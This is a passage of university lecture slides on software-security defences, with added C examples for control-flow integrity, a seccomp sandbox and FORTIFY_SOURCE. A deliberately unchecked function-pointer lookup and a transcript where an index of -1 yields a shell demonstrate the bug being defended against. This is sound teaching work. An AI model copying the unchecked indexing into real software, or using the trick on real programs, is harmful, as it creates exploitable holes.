[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
```
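A hardened version of the dispatcher above, added here as an example and not the lecture's code: the index is parsed strictly and bounds-checked before it is used, and the resolved pointer is additionally compared against an explicit allow-list of command handlers before the indirect call, which is the forward-edge check from the "Self awareness" slide. The handler names follow the slide, but the handlers return a status instead of exiting, prompting or spawning a shell so the dispatcher can be exercised; the dangerous `debug` routine stays in the binary so the check has something to reject. Note the caveat the CFI slide makes: a compiler scheme that only checks the type of the target, such as clang's `-fsanitize=cfi-icall`, would accept `debug`, because it is address-taken and has the same signature as the legitimate commands. The bounds check is what stops the out-of-bounds read; the per-call-site allow-list is a second, finer-grained check.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Prototyped type: the slide's void (*)() is an old-style declaration, and
 * compiler CFI schemes key on the exact function type. */
typedef int (*command_fn)(void);

int help(void)   { puts("Display this help message"); return 0; }
int unlock(void) { puts("Enter PIN: (unlock sequence would start here)"); return 0; }
int quit(void)   { puts("Bye!"); return 0; }
int debug(void)  { puts("Here is your shell"); return 0; }   /* leftover, not a command */

static const command_fn commands[] = { help, unlock, quit };
#define NUM_COMMANDS (sizeof commands / sizeof commands[0])

/* Forward-edge check: may this call site reach `target`? The set is listed
 * explicitly rather than derived from the function type, so debug() is
 * excluded even though its type matches. Returns 1 if allowed, 0 otherwise. */
int cfi_target_allowed(command_fn target) {
    for (size_t i = 0; i < NUM_COMMANDS; i++)
        if (commands[i] == target) return 1;
    return 0;
}

/* Strict integer parsing: atoi() turns "abc" into 0 and silently accepts
 * overflow and trailing garbage. Returns 0 on success. */
int parse_index(const char *text, long *out) {
    char *end = NULL;
    errno = 0;
    long v = strtol(text, &end, 10);
    if (errno != 0 || end == text || *end != '\0') return -1;
    *out = v;
    return 0;
}

/* Bounds-checked dispatch. Returns the handler's status, or -1 for any
 * argument that does not name a command: no out-of-bounds read any more,
 * so "-1" and "10" can no longer reach memory beside commands[]. */
int dispatch(const char *arg) {
    long idx;
    if (parse_index(arg, &idx) != 0) return -1;
    if (idx < 0 || (unsigned long)idx >= NUM_COMMANDS) return -1;
    command_fn target = commands[idx];
    if (!cfi_target_allowed(target)) abort();   /* table entry was tampered with */
    return target();
}

/* What a corrupted table entry would look like: the pointer now names debug().
 * A type-based check cannot tell the difference; the allow-list can.
 * Returns 1 if the pointer is rejected. */
int tampered_pointer_rejected(void) {
    command_fn corrupted = debug;
    return cfi_target_allowed(corrupted) == 0;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: pwdman-ui <0-%zu>\n", NUM_COMMANDS - 1);
        return 1;
    }
    int rc = dispatch(argv[1]);
    if (rc < 0) {
        fprintf(stderr, "invalid command: %s\n", argv[1]);
        return 1;
    }
    return rc;
}
```

To see what the compiler-provided check adds on top, build with `clang -flto -fvisibility=hidden -fsanitize=cfi-icall`: it instruments every indirect call with a check that the target is an address-taken function of the matching type, which catches a pointer overwritten with an arbitrary address (a ROP gadget, shellcode) but not a pointer swapped for another legitimate `int (*)(void)` such as `debug`.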
![Page 391: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/391.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 392: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/392.jpg)
Control-flow integrity - Example (same program, compiled with clang CFI)
% clang pwdman-ui.c -fsanitize=cfi -flto -fvisibility=hidden \
    -fno-sanitize-trap=all -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 10
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type 'void ()' failed during indirect function call
0x2079616c70736944: note: (unknown) defined here
% ./pwdman-ui -1
pwdman-ui.c:43:9: runtime error: control flow integrity check
for type 'void ()' failed during indirect function call
0x000000293028: note: (unknown) defined here
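What the two transcripts show, reconstructed as an added example (this is not the lecture's pwdman-ui.c, whose source is not on the page; all names are assumptions): a menu dispatched through a function-pointer table that is indexed with a number taken straight from the command line. An index of 10 or -1 reads the memory next to the table and calls whatever it finds there. The first "address" in the CFI diagnostic, 0x2079616c70736944, is simply the little-endian bytes of the string "Display ", i.e. the program read adjacent string data as a function pointer. Clang's CFI (-fsanitize=cfi, which needs -flto and works properly only with -fvisibility=hidden) checks at every indirect call that the target is a function of the expected type; without -fno-sanitize-trap=all the failure is a silent trap instead of the diagnostic. CFI turns the shell into a crash; the real fix is the range check in lookup_checked.

```c
/* Added example: a menu dispatched through a function-pointer table, once
 * without and once with a range check. Not the lecture's pwdman-ui.c; all
 * names are assumptions.
 *   plain:    clang dispatch.c -o dispatch
 *   with CFI: clang dispatch.c -fsanitize=cfi -flto -fvisibility=hidden \
 *                 -fno-sanitize-trap=all -o dispatch */
#include <stdio.h>
#include <stdlib.h>

typedef void (*handler_t)(void);

static void show_help(void) { puts("Display this help message"); }
static void enter_pin(void) { puts("Enter PIN:"); }
static void quit(void)      { puts("Bye!"); }

/* The table the user's number indexes into. Whatever the compiler places
 * next to it in .rodata (e.g. the string literals above) is what an
 * out-of-range index reads as a "function pointer". */
static const handler_t menu[] = { show_help, enter_pin, quit };
#define MENU_LEN ((long)(sizeof(menu) / sizeof(menu[0])))

/* Vulnerable variant: no range check. menu[10] or menu[-1] is an
 * out-of-bounds read, and calling the result is the attacker's control-flow
 * hijack. With -fsanitize=cfi the indirect call is checked against the type
 * 'void ()' and aborts instead. Shown only for the bug class; never call it
 * with untrusted input. */
handler_t lookup_unchecked(long choice) {
    return menu[choice];
}

/* Hardened variant: reject everything outside [0, MENU_LEN) before the
 * index is used at all. Returns NULL for invalid input. */
handler_t lookup_checked(long choice) {
    if (choice < 0 || choice >= MENU_LEN)
        return NULL;
    return menu[choice];
}

/* Run menu entry 'choice'. Returns 0 on success, -1 if it was rejected. */
int run_menu(long choice) {
    handler_t h = lookup_checked(choice);
    if (h == NULL)
        return -1;
    h();                       /* the indirect call that CFI instruments */
    return 0;
}

/* Parse a command-line argument strictly: the whole string must be a
 * decimal number. Returns 0 and stores the value, or -1 on junk. */
int parse_choice(const char *s, long *out) {
    char *end = NULL;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0')
        return -1;
    *out = v;
    return 0;
}

int main(int argc, char **argv) {
    long choice;
    if (argc != 2 || parse_choice(argv[1], &choice) != 0) {
        fprintf(stderr, "Usage: %s <0-%ld>\n", argv[0], MENU_LEN - 1);
        return 1;
    }
    if (run_menu(choice) != 0) {
        fprintf(stderr, "invalid choice %ld\n", choice);
        return 1;
    }
    return 0;
}
```

Running the hardened binary with 10 or -1 prints "invalid choice" and exits; only the unchecked lookup reproduces the segfault and the CFI report. Note that CFI only checks the call target's type, so a forged pointer to a different function with signature void () would still pass; the range check is what removes the bug.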
Is that all we can do?
• We discussed techniques that target the instantiation step:
• Canaries
• ASLR
• and control-flow integrity, which targets the programming step
• They provide good protection, but each of them can be circumvented
• So why use countermeasures that can be circumvented?
Costs and Raising the Bar
• Often we hear arguments such as
• "We have to increase the costs / raise the bar for an attacker"
• "Many layers of security make it a lot harder for an attacker"
• That is partly true, however...
• ...in most cases there is a trade-off
• Increased cost for the attacker usually comes with increased
cost for the user as well
→ slower programs, increased memory consumption, ...
Costs and Raising the Bar
• The user pays these costs every time the program runs
• The attacker pays the cost of bypassing a countermeasure only once
• A defender has to decide for each individual case whether such a
trade-off is worth it
Costs and Raising the Bar
• Presented countermeasures provide a good trade-off between
cost and security
• This is one reason why they are widely used
• Future hardware might implement some countermeasures to
reduce the costs
• What else can we do in the meantime?
Limit the damage
• Countermeasures might not prevent an attack by a sophisticated attacker
→ Restrict what the attacker can do after the exploit
• Protect the rest of the system, even if the application is fully controlled by
the attacker
Sandboxing
Sandboxing - Demo
• Simple sandboxing with Docker can be as easy as running one command:
% docker run --rm --read-only=true -i --cap-drop=all \
    --net=none -v $PWD:/app -t ubuntu /app/pwdman
Enter PIN: ? ? ? ? ? ? ? ?
# ls
app bin boot dev etc home lib lib64 media mnt
opt proc root run sbin srv sys tmp usr var
# echo "test" > /tmp/test
sh: 4: cannot create /tmp/test: Read-only file system
# networkctl
IDX LINK TYPE OPERATIONAL SETUP
1 lo loopback n/a n/a
1 links listed.
Sandboxing - Demo
• An attacker cannot do much anymore
• The container's root file system is read-only, so no files can be changed or created there
• No files of the host computer are visible, except the program and
the password list in the bind-mounted directory
• There is no network connection to easily exfiltrate data
• Even if our program is owned by an attacker, the attacker can
at least not harm the rest of the system
• Caveats for practice: --read-only covers only the container's root file system; a -v bind mount stays
writable unless it is mounted with :ro (-v $PWD:/app:ro). The process also still runs as root inside
the container (note the # prompt); --user runs it as an unprivileged user instead
Expect the worst
• Always expect the worst case that could happen!
• In this case: the attacker found an exploitable bug, circumvented all
countermeasures, got a shell in the sandbox and was able to
read the password file
→ No problem if the file is encrypted and the key is derived from the PIN
• (Assuming the crypto is good, you used it correctly, and the PIN has enough entropy:
a key derived from a four- to six-digit PIN can be brute-forced offline once the
attacker holds the file, however slow the key derivation function)
Why use a Sandbox then?
• If we encrypt the data, do we even benefit from a sandbox?
• Attacker cannot read the password file anyway
Always use a Sandbox!
• Without a sandbox, the attacker can create and modify files
• The attacker could install a keylogger or other malicious software
• Or replace the password manager with a manipulated one that
leaks the PIN
• The best crypto does not help if the system is compromised
100 Michael Schwarz — www.iaik.tugraz.at
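The sandbox the slide argues for, as an added example that is not part of the lecture: a Linux seccomp-BPF filter that still lets the process read files but makes every attempt to open a file for writing, create, delete or rename one fail with EPERM, so a compromised password manager cannot drop a keylogger or overwrite its own binary. The function names, the set of denied syscalls and the `/dev/null` probe are this example's own choices; the kernel interfaces (`prctl`, `SECCOMP_MODE_FILTER`, the classic BPF macros) are real.

```c
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* Added example, not from the slides: deny file modification via seccomp-BPF. */

#if defined(__x86_64__)
#define DEMO_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define DEMO_ARCH AUDIT_ARCH_AARCH64
#else
#error "this example covers x86_64 and aarch64 only"
#endif

/* open(2) flag bits that modify the file system. */
#define WRITE_FLAGS (O_WRONLY | O_RDWR | O_CREAT | O_TRUNC | O_APPEND)
/* Verdict handed to the sandboxed code: the syscall fails with EPERM. */
#define DENY (SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA))

/* Rule "if nr == sys: deny", 3 instructions with fixed jump offsets. */
static void emit_deny(struct sock_filter *p, unsigned *n, unsigned sys) {
    p[(*n)++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr));
    p[(*n)++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, sys, 0, 1);
    p[(*n)++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, DENY);
}

/* Rule "if nr == sys and (args[flags_arg] & WRITE_FLAGS): deny", 5 instructions. */
static void emit_write_check(struct sock_filter *p, unsigned *n, unsigned sys, unsigned flags_arg) {
    /* args[] are 64-bit; the low 32 bits are enough on the little-endian targets above. */
    unsigned off = offsetof(struct seccomp_data, args) + flags_arg * sizeof(((struct seccomp_data *)0)->args[0]);
    p[(*n)++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr));
    p[(*n)++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, sys, 0, 3);        /* other syscall: next rule */
    p[(*n)++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, off);
    p[(*n)++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JSET | BPF_K, WRITE_FLAGS, 0, 1); /* read-only: skip deny */
    p[(*n)++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, DENY);
}

/* Install the filter in the calling thread; 0 on success. Cannot be undone. */
int install_no_write_sandbox(void) {
    struct sock_filter prog[48];
    unsigned n = 0;
    /* Syscall numbers differ per ABI: kill the process if it is not the one we built for. */
    prog[n++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch));
    prog[n++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, DEMO_ARCH, 1, 0);
    prog[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL);
    emit_write_check(prog, &n, __NR_openat, 2);   /* openat(dirfd, path, flags, ...) */
#ifdef __NR_open                                  /* legacy entry point, absent on aarch64 */
    emit_write_check(prog, &n, __NR_open, 1);     /* open(path, flags, ...) */
#endif
#ifdef __NR_creat
    emit_deny(prog, &n, __NR_creat);
#endif
    emit_deny(prog, &n, __NR_unlinkat);
    emit_deny(prog, &n, __NR_renameat2);
    prog[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW);

    struct sock_fprog fprog = { .len = (unsigned short)n, .filter = prog };
    /* Unprivileged processes may only filter after promising never to regain
     * privileges, otherwise they could sabotage setuid programs they exec. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);
}

/* Probe: open("/dev/null", flags) in a forked child, sandboxed first if asked.
 * Returns 0 if the open succeeded, the errno the child saw, or -1 on harness
 * failure (including the child being killed by the arch check). */
int attempt_open(int sandboxed, int flags) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (sandboxed && install_no_write_sandbox() != 0)
            _exit(127);
        int fd = open("/dev/null", flags, 0600);
        if (fd >= 0) {
            close(fd);
            _exit(0);
        }
        _exit(errno & 0x7f);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) {
    printf("no sandbox, O_WRONLY : %d\n", attempt_open(0, O_WRONLY));
    printf("sandbox,    O_RDONLY : %d\n", attempt_open(1, O_RDONLY));
    printf("sandbox,    O_WRONLY : %d (EPERM is %d)\n", attempt_open(1, O_WRONLY), EPERM);
    printf("sandbox,    O_CREAT  : %d\n", attempt_open(1, O_RDONLY | O_CREAT));
    return 0;
}
```

The filter is inherited across fork and execve, so it must be installed after the program has opened its log files and before it touches untrusted input. Production sandboxes use an allowlist (libseccomp, systemd's SystemCallFilter, a container runtime profile) rather than a denylist like this one: a denylist is only as complete as its author's knowledge of the syscall table, and for instance io_uring can open files without ever issuing openat.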
Best practice
• Never assume perfect countermeasures or bug-free code
• Encrypt your data in case it leaks (it will at some point)
• Minimize privileges (e.g., a server should not run as root)
• Log everything – in case of an attack, you have a chance to find (and sue) the attacker
• The compiler can help to harden your application, e.g., using compile flags such as -D_FORTIFY_SOURCE=2 (which only takes effect with optimization enabled, i.e., -O1 or higher)
101 Michael Schwarz — www.iaik.tugraz.at
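What -D_FORTIFY_SOURCE=2 actually checks, as an added example that is not from the slides: with optimization on, glibc's headers replace a call such as memcpy(dst, src, n) by __memcpy_chk(dst, src, n, __builtin_object_size(dst, 0)), which aborts when n exceeds the destination size the compiler could determine. The block below writes that check out in plain C so the outcome is a return value instead of a crash; checked_memcpy, FORTIFIED_MEMCPY and the two probe functions are this example's own names, and the only real compiler feature used is __builtin_object_size (GCC and Clang).

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides: the bound check behind _FORTIFY_SOURCE. */

/* Stand-in for glibc's __memcpy_chk: where the fortified version calls
 * __chk_fail() and aborts, this returns -1. */
static int checked_memcpy(void *dst, const void *src, size_t n, size_t dst_size) {
    if (n > dst_size)
        return -1;
    memcpy(dst, src, n);
    return 0;
}

/* Same trick as the fortified headers: bind the destination size at the call
 * site, where the compiler may know it. If it does not, __builtin_object_size
 * yields (size_t)-1 and the check silently passes everything. */
#define FORTIFIED_MEMCPY(dst, src, n) \
    checked_memcpy((dst), (src), (n), __builtin_object_size((dst), 0))

/* Destination is a local 16-byte array: the size is visible, so n > 16 is refused. */
int copy_into_stack_buffer(size_t n) {
    char payload[64];          /* constructed input, not attacker data */
    char buf[16];
    memset(payload, 'A', sizeof payload);
    if (n > sizeof payload)
        return -2;             /* keep the example itself free of out-of-bounds reads */
    return FORTIFIED_MEMCPY(buf, payload, n);
}

/* What the check can see for a local array: 16. */
size_t known_size_of_local(void) {
    char buf[16];
    return __builtin_object_size(buf, 0);
}

/* What the check can see for a pointer that arrived as a parameter: nothing.
 * noinline keeps the optimizer from looking into the caller and spoiling the demo. */
__attribute__((noinline)) size_t known_size_of_opaque(char *dst) {
    return __builtin_object_size(dst, 0);   /* (size_t)-1: size unknown, check disabled */
}

int main(void) {
    char scratch[32];
    printf("copy 16 into 16-byte buffer: %d\n", copy_into_stack_buffer(16));
    printf("copy 17 into 16-byte buffer: %d\n", copy_into_stack_buffer(17));
    printf("size known for local array : %zu\n", known_size_of_local());
    printf("size known through pointer : %zu\n", known_size_of_opaque(scratch));
    return 0;
}
```

Two caveats follow directly from this: glibc only enables the fortified wrappers when __OPTIMIZE__ is set, so -D_FORTIFY_SOURCE=2 without at least -O1 changes nothing (the headers emit a warning saying so); and the check never fires where the size is unknown, which is exactly the case for a buffer passed into a function by pointer. FORTIFY_SOURCE therefore catches the easy overflows for free but does not replace explicit bounds checks.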
Take Aways
• Never ignore compiler warnings
• Don’t disable default countermeasures (e.g., stack canaries)
• Enable countermeasures that are cheap, e.g., ASLR
• Consider stronger countermeasures, such as CFI
• Always consider sandboxing your application
102 Michael Schwarz — www.iaik.tugraz.at
Summary
• Defending software is hard, but not impossible
• Defenses are important to raise the cost for an attacker
• Security is a cat-and-mouse game full of repetitions
• The best countermeasure: don’t have bugs in your code
• Realistic view: it is impossible to have bug-free code, but try to reduce the number of bugs
103 Michael Schwarz — www.iaik.tugraz.at
Any Questions?